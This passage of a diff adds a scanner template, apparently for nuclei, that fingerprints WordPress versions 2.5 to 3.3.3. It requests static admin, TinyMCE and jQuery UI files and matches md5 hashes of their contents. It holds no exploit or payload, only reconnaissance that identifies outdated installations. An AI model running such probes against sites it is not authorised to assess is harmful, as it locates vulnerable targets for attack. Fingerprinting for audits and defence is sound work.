"{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/sflogo.png" + matchers: + - type: dsl + name: 2.5 - 3.1.4 + dsl: + - "(\"18cbf7ea0ccc1d0aa42260aa9787af6f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/help.gif" + matchers: + - type: dsl + name: 2.5 - 3.1.4 + dsl: + - "(\"4cd4a5d2cdcd74c8aeced17813afd6ea\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/more.gif" + matchers: + - type: dsl + name: 2.5 - 3.1.4 + dsl: + - "(\"dff3bc0a01a614b601b7826415bfe4ca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/toolbars.gif" + matchers: + - type: dsl + name: 2.5 - 3.1.4 + dsl: + - "(\"33e46a907572061c981e459ae022b40d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/star.gif" + matchers: + - type: dsl + name: 
2.7 - 3.1.4 + dsl: + - "(\"53b4445439bcf04aa36901548e379f12\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/logo-login.gif" + matchers: + - type: dsl + name: 2.7 - 3.1.4 + dsl: + - "(\"c62e03cf2e9417e6019657b3f5379802\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"47de928cafe74515a762f12a772c4823\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/list-table.dev.js" + matchers: + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"b46a2638e88cb46acf8e49adb4622621\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/list-table.js" + matchers: + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"4ade95840705b173a03fc072e782ef9d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/admin-bar-sprite-rtl.png" + matchers: + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"6c1fbae84aab492cd1fff36c7f0e454d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/l10n.js" + matchers: + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"d64dc5dca841a048946621b935e540a3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/l10n.dev.js" + matchers: + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"790e0e24a1f8061d75e8af6e4a8b6f9b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui.draggable.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"58fe07c845c4146d80ce929bcaccecc1\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"f1555bd3272ddfa24ce25de7090ceb21\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"e506c249ba3ba3bcf5468c4db2f1cd61\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"10f4e2da1843f09b7398217ce96402e2\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"151b6a710a60834b376d87dc81d38187\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui.position.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - 
"(\"eda7e30312f7f5330fa88a1a9a1c31df\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"a5fa42980074a99f53059597069d2077\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui.core.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"4688f380b9e0021db778a38ca0f5df6f\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"3d98d20c912618e3519321a81d5829b0\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"73359044f78d5055ce92d835f71ca8bc\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"77081f376fc4bc59694d88000fba7c3c\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"f4618e213871a41e023e295367d932ce\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"04a74a9472b373a35d38d488259072dd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui.dialog.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"28c3ee6cd4928b4023a6efc0d0b0bd1f\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"6cd7537598b6a62b1c49f7642ce20ea0\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"208575d150c2df5441725b768a5f8465\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"58e37a6a9905f9aa09170df90c5517e2\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"2810e7ba77f48226445fe67f00e0278c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui.widget.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"5a2daaad606706ff30162cd91f4e52ae\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"0627e92c9275c569f8eb69485f91600f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui.tabs.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"087072e535830ca3ba52af113a14f1c7\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"f1ec6bf7c91dba53f793c4e0b00b5b43\" == md5(body))" + - type: 
dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"60baf0f868b3817860daede9d99266b3\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"92321373c9dcad8d096abd76ba18c02d\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"db82282a162891af35802d19093f32d2\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"714e864501b632b248ad4653f942b433\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"79ba03ebbddfe85f3bab511b653426a6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui.mouse.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"20b9fd26e3ca272b473511601b7604d9\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"b8cc842248a8e9f6ab905db47919ce91\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui.selectable.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"9fe50669ab990a4b530d32cff4ec1269\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"778423eb2b5ec020eb01470c17c2d242\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"0590a2173096ae62a72f829988167ce9\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"bcb1ae0fac5fa2d18aa6b36ab65c59d3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui.resizable.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"1c7ac560b262e562dec64427d6b6551a\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"840edcdd83bd4b13b7f511cde103e2d3\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"44d86a9737e5214b713042621529aec1\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"5c04b89c0237cb4408d364b38d0888a2\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"11498ad77b63b676cabf446da36be84c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui.sortable.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - 
"(\"2694e10af5cbfbbcd54c76c72927cb4d\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"ee4315bdb09d4327d7c6144fc620a1eb\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"70425b8b665ce7069e2d3d2274a18302\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"8b26b1568a703a7ff4cc4653b4982c0a\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"bed2e54175ca63cc0bec8a864831986f\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"ec1c962315b17de67bc40ff55b406063\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui.button.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"7a293a0579a93cba3d1d06560b48e890\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"2e2303a422d6df8392601fe69fb33e90\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui.droppable.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"3c8749db46671da792bbdf1b4827110f\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"3ec22af31cb8d288bc930bae1540a9bf\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"9c34826f6918d94f8e2d0e92f8a603a2\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"422b880abd2de6c562ce1956ed6ba842\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/separator.gif" + matchers: + - type: dsl + name: 2.5 - 3.2.1 + dsl: + - "(\"9636c1e228dc5d7c58ec2722a6d9ec23\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/down_arrow.gif" + matchers: + - type: dsl + name: 2.5 - 3.2.1 + dsl: + - "(\"7bbbc00f708a791dc4e674f9e21aa2ca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/fade-butt.png" + matchers: + - type: dsl + name: 2.5 - 3.2.1 + dsl: + - "(\"e6c8b1c6db50db66bf04da9bbbe3ee0e\" == md5(body))" 
+ - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/button_bg.png" + matchers: + - type: dsl + name: 2.5 - 3.2.1 + dsl: + - "(\"8c9b1f0ee9deb6374983650edbd6ddfc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/butt2.png" + matchers: + - type: dsl + name: 2.7 - 3.2.1 + dsl: + - "(\"f8177b2875cc2f1988f3a8645edfddb8\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"8063404a9759063d641ebfa8247b42fb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/wpicons.png" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"968a7e190df87105abfa07fef2d3fe61\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/img/toggle-arrow.png" + matchers: + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"e5064769584f17a701131db269226700\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/css/wplink.css" + matchers: + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"6898c9d2f70705ee44ade16b719bdec7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/css/wplink-rtl.css" + matchers: + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"82c0f4232973144f8ead47babec37954\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/css/wplink-rtl.dev.css" + matchers: + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"71c5a295547703474a311da1fb8a5375\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/css/wplink.dev.css" + matchers: + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"b98b951d96fa73562fecd5ddae985765\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/js/wplink.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"df344323225092a8ac4fe18dd3aadda9\" == 
md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"8ca64ed1952868df64573291d7510e24\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/js/wplink.dev.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"a2cf78fd7dbfe9f0ddfd5416a8d41a96\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"3b3d8b1cf11181517c34f9e99bf272d3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/press-this-rtl.dev.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"29d1cde9c4907a89660c0f97dbbdbc7b\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"3ad85ded601480becdacc5b37d051a7d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/theme-editor.dev.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"f9b9af32ed5955188b95884c23a97710\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"08e782d86bb604d248af760965c44f9d\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"19af75a47678407c01b7bd89b514c382\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"1d469fa64b12915edd13d68148453c72\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/plugin-install.dev.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"e027ddfda419b05633c45aacd35d2792\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"c93baaf77ab530218abdfb9d30bbb42f\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"0e3febdb81a87285c18b37f9ca01e63a\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"48705f886f1714e4c4c130e5fa7443f8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/nav-menu-rtl.dev.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"a3e3c3795fd7fd526c86a8f2fb82e7b4\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"feff33da67f435d20eab953db34d0c63\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-admin/css/login-rtl.dev.css" + matchers: + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"b26a9eb0910662acf803506350ddfd9e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/theme-install-rtl.css" + matchers: + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"994b061f1d4ef82fe4dda82e887fdebd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/theme-install-rtl.dev.css" + matchers: + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"79d3545aa4f635d3149694e840aa313e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/install-rtl.dev.css" + matchers: + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"fd87273191560d2a4909d5a451e85223\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/nav-menu-rtl.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"d21087ddbbd66002089743c75b3e9333\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"9c89cdcb450005439bfd953bc41d7650\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/theme-editor-rtl.dev.css" + matchers: + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"67937f3a3e8e4b9eeaa5fe15c1cce63b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors-classic-rtl.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"e215ec4d06602d4ab70f906aec41a9ad\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"f0745260a97915cdee9e8964521ba987\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"b379a4aab078c4970c9b387cc8ccf77a\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"74e3bc0961e42685a1b2918ee21de19f\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"cb467b50c6b9c2151d5767c3df8d56aa\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"f167446b6210eda62f730de80f2af755\" == md5(body))" + - type: dsl + name: 2.5 - 2.6 + dsl: + - "(\"fa538e7d2c3f867083940fe5ac32a9b0\" == md5(body))" + - method: GET + 
path: + - "{{BaseURL}}/wp-admin/css/widgets.dev.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"104436a986b68884830b4fecf3fa3188\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"4844a6a0a6e0c14348b6987cf5ac1072\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"b1e23cf91b326d5c4bfb1eb2bc5395cb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors-fresh-rtl.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"1032cbfcb279aff5069a3cc244d633a3\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"982751a4c494ed304013a96bc8e34711\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"eee458d5eaf8a119e8543f311b3b77ed\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"9626c77e24ce9dac516acb7871b1d5d3\" == md5(body))" + - type: dsl + name: 2.5 - 2.6 + dsl: + - "(\"fa538e7d2c3f867083940fe5ac32a9b0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/ms.dev.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"bb8bd3b3f13e4ff26845a4a8f4f1a08d\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"b8dc31acbc73acb7349c56086424a474\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"b8ba7a732b6bf241fcbcdfec837f9356\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors-fresh-rtl.dev.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"4f9b48f621aeca56c45251b2e2d5617c\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"753a209aebc4de7802fe343880137ef6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/theme-install.dev.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"80ae5e0c796d5c27bada602b1bc75250\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"de44af67c75286108f1c54f03e658c4f\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"3203506a8b4bba0e83b097c3fc898bf9\" == md5(body))" + - 
type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"caca2d1c6d7f70138a2cae7cff992f9c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/plugin-install-rtl.dev.css" + matchers: + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"ff2cc41b3ec965996608fc6a416c0d34\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors-classic-rtl.dev.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"e97820effedd99f04729313203cc6a86\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"a952db631dae4e612bb2d4a776920e34\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"3b3df59dfdf298205b1df4f696aa1ef7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/ms.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"c471baf72aebed568505b44ba5a67b6e\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"345810a7e7c3119897bc4c50c26ef511\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"a3d224255ce340dc53f9fc3d61d17250\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/plugin-install.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"cd13af37f71a04a7377f9f068b40897b\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"c65c2422ca7ab18d77e4253e6561d257\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"e39dd2d59cce29b66eaa73ae84f9eda4\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"b65dd37fb61228ea9b035aee471d0cdd\" == md5(body))" + - type: dsl + name: 2.8.3 - 2.8.6 + dsl: + - "(\"48705f886f1714e4c4c130e5fa7443f8\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.2 + dsl: + - "(\"f7d487f7084a44abbb9c73956cfff128\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"ecc45e15b82d9ba24fc97a649d2c3a1a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/nav-menu.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"18de21bea2d949abecd1505d54f8c592\" == 
md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"44c3a17e3475319c2607dc5961d65240\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"47929d6248ad91217aa50432e8073fd3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/widgets-rtl.dev.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"164ea0d8f1aeab1804d96101038bdc5f\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"7c8a0c3eae1fe26740f3bb883104dd41\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"3887de3f53f64e803efd5291040c4db1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/theme-install.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"ead37a72366af126a95f6cc0222650d0\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"540967968ab10e20a3ccd1c24a59a891\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"db9fd0a12bc515842828b62ad6c58117\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"96ccb208109e6bd91bb186d3945b712c\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"caca2d1c6d7f70138a2cae7cff992f9c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/plugin-install-rtl.css" + matchers: + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"bb15b10df11592f3c1e803132e07dde8\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"ff2cc41b3ec965996608fc6a416c0d34\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/nav-menu.dev.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"9dc0dddf639df1f6f51abaa804dc7090\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"780263c635eb4e336dbc1dc6f2396abd\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"adcfdb7c1dbd61eeb89a208c1bc0fa0b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/dashboard-rtl.dev.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - 
"(\"c42cf458a0dce157c789d3ea0d537f3d\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"d57884f6c537a8aae2d94f6691a88029\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"ee25e4e0ed7f4daeea286350b91d0656\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/editor-buttons.css" + matchers: + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"3105c2683699bc806904333deb52af38\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/editor-buttons.dev.css" + matchers: + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"3e0233087e54900ed8cac50e14fde27e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpfullscreen/editor_plugin.dev.js" + matchers: + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"d30181a63c565e4468e6fefab0d58bc6\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"1381684254b5110789ee3462bd1dba96\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/editor_plugin.dev.js" + matchers: + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"63d50833c289dca64b69d94cd40ac8ca\" == md5(body))" + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"80d691c90f4f53d4b8f10b7254a0aa6b\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"66ff790001351132589bb63a37a56351\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"7e2136d5e077774bb677dcf3576cb203\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/css/editimage-rtl.css" + matchers: + - type: dsl + name: 2.6 - 3.3.3 + dsl: + - "(\"9afbd20302a56bc9e0d7bcc5c3c61c7c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/editor_plugin.dev.js" + matchers: + - type: dsl + name: 3.1 - 3.3.3 + dsl: + - "(\"9dd84d5a159ba243f18568c223a534b6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/editor_plugin.dev.js" + 
matchers: + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"48784cf4970b78b03ce5d6da9cac5621\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"019b69e24bd4ccfb538504501851c2cd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/editor_plugin.dev.js" + matchers: + - type: dsl + name: 2.9 - 3.3.3 + dsl: + - "(\"b187c382589dac1006d284967d24c62d\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"208d2715778f5e1f2086e5efba4be695\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/img/gallery.png" + matchers: + - type: dsl + name: 2.7 - 3.3.3 + dsl: + - "(\"1f35ba36cb43f1c5382a13e6941483df\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/editor_plugin.dev.js" + matchers: + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"c0c35687371b7c544d0b446e297a93d0\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"b13382c0430cc27678f686cff7247fd3\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"818c96b9e6a8a38edb7bd84ed9df9360\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"801c8ecf84caad5d51283aa273d9e5c6\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"b1a44bb492d150ba2fc3ef091649a6ac\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/embedded.png" + matchers: + - type: dsl + name: 2.9 - 3.3.3 + dsl: + - "(\"1fad35f87373d2784de6c125ce3942ed\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/more_bug.gif" + matchers: + - type: dsl + name: 2.5 - 3.3.3 + 